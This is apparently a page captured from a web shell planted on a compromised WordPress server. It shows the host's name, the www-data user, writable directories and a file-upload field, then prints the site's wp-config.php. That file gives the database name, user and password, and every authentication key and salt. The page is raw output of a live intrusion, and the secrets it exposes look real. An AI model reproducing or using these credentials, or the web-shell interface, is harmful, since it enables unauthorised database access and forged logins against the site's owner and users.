Heray-Was-Here
Server : Apache
System : Linux mail.lomejor.cr 6.8.0-1059-azure #65~22.04.1-Ubuntu SMP Thu May 28 16:59:19 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.2.31
Disable Function : NONE
Directory :  /var/www/store/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/store/wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wp_devmultitienda' );

/** Database username */
define( 'DB_USER', 'wp_devmultitiendauser' );

/** Database password */
define( 'DB_PASSWORD', 'wp_devmultitienda%36913' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );



/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         '/@P@NZ!wn?$c1&5[sgy eq.tKOe2oBSGP)Ivm3>IU5q]RfTW6144wgwKB$b5vh&X' );
define( 'SECURE_AUTH_KEY',  '~vF)XJj7Fm]@#kMDgKbw!44(7e_o;X`ttnHR~YD=qtnV4)O2%=aV(yXHEXzc+u`Q' );
define( 'LOGGED_IN_KEY',    '^_Ar+MI) PDgp@=-c/~_1Jq)uJnKvRi}p=gfdG$[XQtikG_s1M9Dq,]nfwKLI&RT' );
define( 'NONCE_KEY',        '^W+orGhWuFqp/v(/g^lwn540HmAq-1-CIC>V0d]f<G,+UrD*;rT??4IjFV=OpR4<' );
define( 'AUTH_SALT',        'K$L:&cyJr-Q1n&:e4aeERQ~*r1gBd?AO=cGl)%9Q{JF^Ty31I%o&~BU >pI%#1%W' );
define( 'SECURE_AUTH_SALT', 'Y}i2y diOzp x~qWfE1Es0*j!<%8W~)d)*G.e/G7C-0O}1RFV_d#_)x@k@#u-(ps' );
define( 'LOGGED_IN_SALT',   'zT%^TWW4DUM|LpMf8uidwx@NQgaB]z_ZbpJ`GQCKlE+@R0nn!thNqm=ea#E8LK`-' );
define( 'NONCE_SALT',       '$)_-#!DTSdQN %^d6;evf>$Bwj]GKk@YjM9.oFGRSz|hQw[L-5-L@>Uz|Z;F_@..' );

/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', true );
define( 'WP_DEBUG_LOG', true );
define( 'WP_DEBUG_DISPLAY', false );
define( 'WPS_DEBUG', true );

/* Add any custom values between this line and the "stop editing" line. */



/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';

Hry